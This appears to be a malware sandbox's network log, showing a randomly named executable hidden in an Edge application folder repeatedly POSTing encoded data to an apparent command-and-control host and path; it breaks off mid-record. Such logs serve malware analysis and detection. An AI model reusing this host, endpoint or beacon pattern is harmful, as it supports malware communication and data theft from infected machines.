                                                                                                                      Dec 20, 2024 21:17:33.110857964 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:33.462671995 CET | 2644 | OUT | Data Raw: [2644-byte request body]
                                                                                                                      Dec 20, 2024 21:17:34.381798983 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:34.616730928 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:32 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      4 | 192.168.2.4 | 49743 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:17:37.146848917 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:37.504343033 CET | 2644 | OUT | Data Raw: [2644-byte request body]
                                                                                                                      Dec 20, 2024 21:17:38.417773008 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:38.652527094 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:36 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      5 | 192.168.2.4 | 49744 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:17:39.047769070 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:39.394994020 CET | 2644 | OUT | Data Raw: [2644-byte request body]
Dec 20, 2024 21:17:40.342910051 CET  25  IN  HTTP/1.1 100 Continue
Dec 20, 2024 21:17:40.576973915 CET  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 20:17:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 59 5c 5b
Data Ascii: <Y\[


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
6  192.168.2.4  49745  37.44.238.250  80  7664  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp  Bytes transferred  Direction  Data
Dec 20, 2024 21:17:41.246859074 CET  288  OUT  POST /provider_cpugame.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 703648cm.renyash.top
Content-Length: 2640
Expect: 100-continue
Dec 20, 2024 21:17:42.523643017 CET  25  IN  HTTP/1.1 100 Continue
Dec 20, 2024 21:17:42.756613970 CET  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 20:17:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 59 5c 5b
Data Ascii: <Y\[


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
7  192.168.2.4  49747  37.44.238.250  80  7664  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp  Bytes transferred  Direction  Data
Dec 20, 2024 21:17:43.072679996 CET  288  OUT  POST /provider_cpugame.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 703648cm.renyash.top
Content-Length: 2644
Expect: 100-continue
Dec 20, 2024 21:17:44.355140924 CET  25  IN  HTTP/1.1 100 Continue
Dec 20, 2024 21:17:44.588921070 CET  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 20:17:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 59 5c 5b
Data Ascii: <Y\[


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
8  192.168.2.4  49749  37.44.238.250  80  7664  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp  Bytes transferred  Direction  Data
Dec 20, 2024 21:17:45.077178955 CET  288  OUT  POST /provider_cpugame.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 703648cm.renyash.top
Content-Length: 2644
Expect: 100-continue
Dec 20, 2024 21:17:46.349710941 CET  25  IN  HTTP/1.1 100 Continue
Dec 20, 2024 21:17:46.589010954 CET  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 20:17:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 59 5c 5b
Data Ascii: <Y\[


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
9  192.168.2.4  49750  37.44.238.250  80  7664  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp  Bytes transferred  Direction  Data
Dec 20, 2024 21:17:46.880517006 CET  288  OUT  POST /provider_cpugame.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 703648cm.renyash.top
Content-Length: 2644
Expect: 100-continue
Dec 20, 2024 21:17:48.172075987 CET  25  IN  HTTP/1.1 100 Continue
Dec 20, 2024 21:17:48.404563904 CET  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 20:17:46 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 59 5c 5b
Data Ascii: <Y\[


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
10  192.168.2.4  49751  37.44.238.250  80  7664  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp  Bytes transferred  Direction  Data
Dec 20, 2024 21:17:48.701858997 CET  288  OUT  POST /provider_cpugame.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 703648cm.renyash.top
Content-Length: 2644
Expect: 100-continue
Dec 20, 2024 21:17:49.978621006 CET  25  IN  HTTP/1.1 100 Continue
Dec 20, 2024 21:17:50.212682009 CET  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 20:17:48 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 59 5c 5b
Data Ascii: <Y\[


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
11  192.168.2.4  49752  37.44.238.250  80  7664  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp  Bytes transferred  Direction  Data
Dec 20, 2024 21:17:50.469784975 CET  288  OUT  POST /provider_cpugame.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 703648cm.renyash.top
Content-Length: 2644
Expect: 100-continue
Dec 20, 2024 21:17:51.746090889 CET  25  IN  HTTP/1.1 100 Continue
Dec 20, 2024 21:17:51.980393887 CET  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 20:17:50 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 59 5c 5b
Data Ascii: <Y\[


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
12  192.168.2.4  49753  37.44.238.250  80  7664  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp  Bytes transferred  Direction  Data
Dec 20, 2024 21:17:52.216418982 CET  288  OUT  POST /provider_cpugame.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 703648cm.renyash.top
Content-Length: 2644
Expect: 100-continue
Dec 20, 2024 21:17:53.502317905 CET  25  IN  HTTP/1.1 100 Continue
Dec 20, 2024 21:17:53.740586996 CET  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 20:17:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 59 5c 5b
Data Ascii: <Y\[


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
13  192.168.2.4  49754  37.44.238.250  80  7664  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp  Bytes transferred  Direction  Data
Dec 20, 2024 21:17:53.982399940 CET  288  OUT  POST /provider_cpugame.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 703648cm.renyash.top
Content-Length: 2644
Expect: 100-continue
Dec 20, 2024 21:17:55.263159990 CET  25  IN  HTTP/1.1 100 Continue
Dec 20, 2024 21:17:55.496340036 CET  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 20:17:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 59 5c 5b
Data Ascii: <Y\[


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
14  192.168.2.4  49755  37.44.238.250  80  7664  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp  Bytes transferred  Direction  Data
Dec 20, 2024 21:17:55.736916065 CET  288  OUT  POST /provider_cpugame.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 703648cm.renyash.top
Content-Length: 2644
Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:56.082638979 CET | 2644 | OUT | Data Raw: 58 59 5f 53 58 59 54 57 5a 5b 5b 52 55 5f 51 55 58 5d 59 41 52 5c 54 5d 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XY_SXYTWZ[[RU_QUX]YAR\T]][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!*.4>*'&Y-*79&Y(''X0+%T?1 1$\!"5R'#G!"^,
                                                                                                                      Dec 20, 2024 21:17:57.007005930 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:57.350961924 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:55 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      15 | 192.168.2.4 | 49756 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:17:57.592416048 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:57.941822052 CET | 2644 | OUT | Data Raw: 58 5a 5a 57 58 5b 54 51 5a 5b 5b 52 55 53 51 53 58 5c 59 41 52 5d 54 54 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XZZWX[TQZ[[RUSQSX\YAR]TT][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!A*>$)3Y'*_9(5]7\!),$((T'W2;Y6!*0#G!"^,7
                                                                                                                      Dec 20, 2024 21:17:58.868313074 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:59.100508928 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:57 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      16 | 192.168.2.4 | 49757 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:17:59.340363979 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:59.691917896 CET | 2644 | OUT | Data Raw: 5d 5c 5a 57 5d 5e 51 54 5a 5b 5b 52 55 56 51 51 58 52 59 41 52 50 54 5a 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]\ZW]^QTZ[[RUVQQXRYARPTZ][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!@>-3)&0"_,+279>>;]$85+1 %+$"5U0#G!"^,#
                                                                                                                      Dec 20, 2024 21:18:00.611469984 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:00.844304085 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:58 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      17 | 192.168.2.4 | 49758 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:01.091998100 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:01.441941023 CET | 2644 | OUT | Data Raw: 5d 59 5f 53 5d 5c 54 56 5a 5b 5b 52 55 50 51 50 58 5f 59 45 52 53 54 5f 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]Y_S]\TVZ[[RUPQPX_YERST_][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\">>%3.\:)Y4>Z=+'!S(!01<X!>3#G!"^,
                                                                                                                      Dec 20, 2024 21:18:02.360949039 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:02.596409082 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:00 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      18 | 192.168.2.4 | 49759 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:02.843666077 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:03.192776918 CET | 2644 | OUT | Data Raw: 58 5c 5f 5f 58 5c 54 5f 5a 5b 5b 52 55 51 51 5c 58 5f 59 48 52 5c 54 5b 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X\__X\T_Z[[RUQQ\X_YHR\T[][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\">=+]=9$.,+5^#2X*4;X086<1?P2,!'#G!"^,?
                                                                                                                      Dec 20, 2024 21:18:04.112340927 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:04.344494104 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:02 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      19 | 192.168.2.4 | 49760 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:04.592092991 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:04.942029953 CET | 2644 | OUT | Data Raw: 58 5c 5a 52 5d 59 51 52 5a 5b 5b 52 55 56 51 50 58 52 59 49 52 57 54 55 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X\ZR]YQRZ[[RUVQPXRYIRWTU][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\")#>3$X"^91Y4:=4 $T+22,69R0#G!"^,#
                                                                                                                      Dec 20, 2024 21:18:05.866475105 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:06.100744009 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:04 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      20 | 192.168.2.4 | 49762 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:06.341312885 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:06.691951990 CET | 2644 | OUT | Data Raw: 5d 5e 5f 5e 5d 56 54 57 5a 5b 5b 52 55 53 51 53 58 52 59 43 52 54 54 5e 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]^_^]VTWZ[[RUSQSXRYCRTT^][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!=<>%]0X=9+X4:Y)B$3;5+2 18Y"1>0#G!"^,7
                                                                                                                      Dec 20, 2024 21:18:07.620045900 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:07.852703094 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:05 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      21 | 192.168.2.4 | 49768 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:08.091265917 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:08.441903114 CET | 2644 | OUT | Data Raw: 58 5f 5f 56 58 5b 51 52 5a 5b 5b 52 55 5e 51 55 58 59 59 47 52 50 54 58 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
